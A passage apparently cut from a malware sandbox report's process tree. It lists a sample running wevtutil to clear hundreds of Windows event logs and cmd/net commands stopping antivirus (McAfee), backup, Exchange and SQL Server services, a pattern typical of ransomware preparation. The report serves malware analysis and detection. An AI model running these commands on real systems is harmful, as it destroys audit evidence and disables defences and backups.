    wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"  (PID 920)
    wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"  (PID 4164)
    wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"  (PID 4960)
    wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"  (PID 4296)
    wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"  (PID 4112)
    wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"  (PID 636)
    wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"  (PID 4436)
    wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"  (PID 4464)
    wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"  (PID 2104)
    wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"  (PID 692)
    wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"  (PID 508)
    wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"  (PID 1716)
    wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"  (PID 5088)
    wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"  (PID 4916)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"  (PID 1600)
    wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"  (PID 3864)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-AAD/Operational"  (PID 804)
    wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"  (PID 1776)
    wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"  (PID 1520)
    wevtutil.exe cl "Microsoft-Windows-ATAPort/General"  (PID 4552)
    wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"  (PID 1528)
    wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"  (PID 4536)
    wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"  (PID 3048)
      - Suspicious use of AdjustPrivilegeToken
    wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"  (PID 4488)
    wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"  (PID 5020)
    wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"  (PID 3288)
    wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"  (PID 4476)
      - Suspicious use of AdjustPrivilegeToken
    wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"  (PID 4156)
    wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"  (PID 1472)
    wevtutil.exe cl "Microsoft-Windows-AppID/Operational"  (PID 1936)
    wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"  (PID 3040)
      - Suspicious use of AdjustPrivilegeToken
    wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"  (PID 4244)
    wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"  (PID 4480)
    wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"  (PID 3768)
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"  (PID 3084)
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"  (PID 2612)
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"  (PID 4372)
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"  (PID 660)
    wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"  (PID 3484)
    wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"  (PID 4508)
    wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"  (PID 4052)
    wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"  (PID 3772)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"  (PID 2108)
    wevtutil.exe cl "Microsoft-Windows-AppSruProv"  (PID 4980)
    wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"  (PID 1740)
    wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"  (PID 976)
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"  (PID 1616)
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"  (PID 2696)
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"  (PID 1612)
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"  (PID 1360)
    wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"  (PID 1480)
    wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"  (PID 4400)
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"  (PID 4020)
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"  (PID 2384)
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"  (PID 2684)
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"  (PID 672)
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"  (PID 4360)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"  (PID 3764)
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"  (PID 4312)
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"  (PID 2332)
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"  (PID 964)
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"  (PID 1016)
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"  (PID 2256)
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"  (PID 2104)
    wevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Diagnostic"  (PID 4464)
    wevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Operational"  (PID 4972)
    wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"  (PID 4652)
    wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"  (PID 1132)
    wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"  (PID 4568)
    wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"  (PID 5064)
    wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"  (PID 5076)
    wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"  (PID 5108)
    wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"  (PID 1320)
    wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"  (PID 392)
    wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"  (PID 3192)
    wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"  (PID 1272)
    wevtutil.exe cl "Microsoft-Windows-Audio/Informational"  (PID 4288)
    wevtutil.exe cl "Microsoft-Windows-Audio/Operational"  (PID 4636)
    wevtutil.exe cl "Microsoft-Windows-Audio/Performance"  (PID 5084)
    wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"  (PID 2772)
    wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"  (PID 800)
    wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"  (PID 4264)
    wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"  (PID 3932)
    wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"  (PID 416)
    wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"  (PID 4528)
    wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"  (PID 4768)
    wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"  (PID 972)
    wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"  (PID 3720)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"  (PID 1436)
    wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"  (PID 4428)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-Backup"  (PID 932)
    wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"  (PID 5052)
    wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"  (PID 4000)
    wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"  (PID 3164)
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"  (PID 940)
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"  (PID 4836)
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"  (PID 3968)
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"  (PID 5004)
    wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"  (PID 2080)
    wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"  (PID 1608)
    wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"  (PID 2116)
    wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"  (PID 3152)
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"  (PID 1104)
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"  (PID 3700)
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"  (PID 2300)
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"  (PID 5020)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"  (PID 3240)
    wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"  (PID 4892)
    wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"  (PID 1908)
    wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"  (PID 280)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"  (PID 388)
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"  (PID 2156)
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"  (PID 1224)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"  (PID 1036)
    wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"  (PID 1172)
    wevtutil.exe cl "Microsoft-Windows-COM/Analytic"  (PID 3248)
    wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"  (PID 4220)
    wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"  (PID 984)
    wevtutil.exe cl "Microsoft-Windows-COM/Call"  (PID 4512)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"  (PID 632)
    wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"  (PID 4920)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"  (PID 1304)
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"  (PID 1488)
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"  (PID 260)
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"  (PID 2100)
    wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"  (PID 4016)
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"  (PID 3392)
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"  (PID 4172)
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"  (PID 3148)
    wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"  (PID 580)
    wevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Analytic"  (PID 4260)
    wevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Operational"  (PID 4872)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"  (PID 4276)
    wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"  (PID 1068)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"  (PID 2632)
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"  (PID 1464)
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"  (PID 2984)
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"  (PID 3324)
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"  (PID 3440)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"  (PID 1244)
    wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"  (PID 4952)
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"  (PID 4348)
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"  (PID 3244)
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"  (PID 636)
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"  (PID 1932)
    wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"  (PID 3444)
    wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"  (PID 4352)
    wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"  (PID 2184)
    wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"  (PID 4436)
    wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"  (PID 4212)
    wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"  (PID 1472)
    wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"  (PID 3380)
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"  (PID 4984)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"  (PID 340)
    wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"  (PID 4256)
    wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"  (PID 4992)
    wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"  (PID 3084)
    wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"  (PID 4988)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"  (PID 3640)
    wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"  (PID 660)
    wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"  (PID 3484)
    wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"  (PID 4404)
    wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"  (PID 2228)
    wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"  (PID 3772)
    wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"  (PID 2108)
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"  (PID 1032)
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"  (PID 1740)
    wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"  (PID 2708)
    wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"  (PID 4556)
    wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"  (PID 1776)
    wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"  (PID 1928)
    wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"  (PID 2392)
    wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"  (PID 1372)
    wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"  (PID 4400)
    wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"  (PID 4020)
    wevtutil.exe cl "Microsoft-Windows-DSC/Admin"  (PID 4228)
    wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"  (PID 2684)
    wevtutil.exe cl "Microsoft-Windows-DSC/Debug"  (PID 672)
    wevtutil.exe cl "Microsoft-Windows-DSC/Operational"  (PID 4360)
    wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"  (PID 3764)
    wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"  (PID 3784)
    wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"  (PID 364)
    wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"  (PID 4284)
    wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"  (PID 964)
    wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"  (PID 1016)
    wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"  (PID 3788)
    wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"  (PID 4584)
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"  (PID 4048)
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"  (PID 3792)
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"  (PID 692)
    wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"  (PID 1648)
    wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"  (PID 576)
    wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"  (PID 4004)
    wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"  (PID 1368)
    wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"  (PID 592)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"  (PID 5108)
    wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"  (PID 4268)
    wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"  (PID 1592)
    wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"  (PID 4200)
    wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"  (PID 1484)
    wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"  (PID 1180)
    wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"  (PID 4456)
    wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"  (PID 904)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"  (PID 5032)
    wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"  (PID 800)
    wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"  (PID 3124)
    wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"  (PID 5044)
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"  (PID 416)
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"  (PID 1268)
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"  (PID 4804)
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"  (PID 3720)
    wevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"  (PID 2568)
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"  (PID 4184)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"  (PID 4488)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"  (PID 4180)
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"  (PID 4176)
    wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"  (PID 4800)
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"  (PID 5000)
      - Clears Windows event logs
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"  (PID 4740)
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"  (PID 5008)
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"  (PID 3968)
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"  (PID 2452)
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"  (PID 2304)
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"  (PID 2136)
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"  (PID 1980)
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"  (PID 5080)
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"  (PID 1384)
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"  (PID 4848)
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"  (PID 5040)
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"4⤵PID:1380
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"4⤵
- Clears Windows event logs
PID:4904
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"4⤵PID:3240
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"4⤵PID:4892
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"4⤵PID:1184
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"4⤵PID:3664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfemms"3⤵PID:3708
-
C:\Windows\system32\net.exenet stop "mfemms"4⤵PID:3484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfemms"5⤵PID:5072
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfevtp"3⤵PID:2696
-
C:\Windows\system32\net.exenet stop "mfevtp"4⤵PID:4384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfevtp"5⤵PID:4404
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MMS"3⤵PID:3836
-
C:\Windows\system32\net.exenet stop "MMS"4⤵PID:1372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MMS"5⤵PID:4552
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mozyprobackup"3⤵PID:2360
-
C:\Windows\system32\net.exenet stop "mozyprobackup"4⤵PID:1360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mozyprobackup"5⤵PID:2684
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer"3⤵PID:2384
-
C:\Windows\system32\net.exenet stop "MsDtsServer"4⤵PID:1252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer"5⤵PID:3520
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"3⤵PID:4652
-
C:\Windows\system32\net.exenet stop "MsDtsServer100"4⤵PID:2412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer100"5⤵PID:2568
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"3⤵PID:4568
-
C:\Windows\system32\net.exenet stop "MsDtsServer110"4⤵PID:1216
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer110"5⤵PID:3060
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeES"3⤵PID:692
-
C:\Windows\system32\net.exenet stop "MSExchangeES"4⤵PID:4588
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeES"5⤵PID:4200
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"3⤵PID:4268
-
C:\Windows\system32\net.exenet stop "MSExchangeIS"4⤵PID:1592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeIS"5⤵PID:5108
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"3⤵PID:1272
-
C:\Windows\system32\net.exenet stop "MSExchangeMGMT"4⤵PID:4636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeMGMT"5⤵PID:1964
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"3⤵PID:904
-
C:\Windows\system32\net.exenet stop "MSExchangeMTA"4⤵PID:2776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeMTA"5⤵PID:4832
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"3⤵PID:416
-
C:\Windows\system32\net.exenet stop "MSExchangeSA"4⤵PID:4492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeSA"5⤵PID:5084
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"3⤵PID:4760
-
C:\Windows\system32\net.exenet stop "MSExchangeSRS"4⤵PID:5080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeSRS"5⤵PID:3720
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"3⤵PID:4176
-
C:\Windows\system32\net.exenet stop "MSOLAP$SQL_2008"4⤵PID:1072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$SQL_2008"5⤵PID:972
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"3⤵PID:5040
-
C:\Windows\system32\net.exenet stop "MSOLAP$SYSTEM_BGC"4⤵PID:4160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"5⤵PID:4488
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"3⤵PID:4512
-
C:\Windows\system32\net.exenet stop "MSOLAP$TPS"4⤵PID:2452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$TPS"5⤵PID:4460
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"3⤵PID:5000
-
C:\Windows\system32\net.exenet stop "MSOLAP$TPSAMA"4⤵PID:3968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$TPSAMA"5⤵PID:4844
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"3⤵PID:2864
-
C:\Windows\system32\net.exenet stop "MSSQL$BKUPEXEC"4⤵PID:4956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"5⤵PID:4788
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"3⤵PID:5100
-
C:\Windows\system32\net.exenet stop "MSSQL$ECWDB2"4⤵PID:3616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$ECWDB2"5⤵PID:2116
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"3⤵PID:1736
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTICEMGT"4⤵PID:3032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"5⤵PID:1384
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"3⤵PID:2604
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTTICEBGC"4⤵PID:1356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"5⤵PID:1224
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"3⤵PID:2100
-
C:\Windows\system32\net.exenet stop "MSSQL$PROFXENGAGEMENT"4⤵PID:2768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"5⤵PID:276
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"3⤵PID:4244
-
C:\Windows\system32\net.exenet stop "MSSQL$SBSMONITORING"4⤵PID:4128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"5⤵PID:4880
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"3⤵PID:4216
-
C:\Windows\system32\net.exenet stop "MSSQL$SHAREPOINT"4⤵PID:4912
-
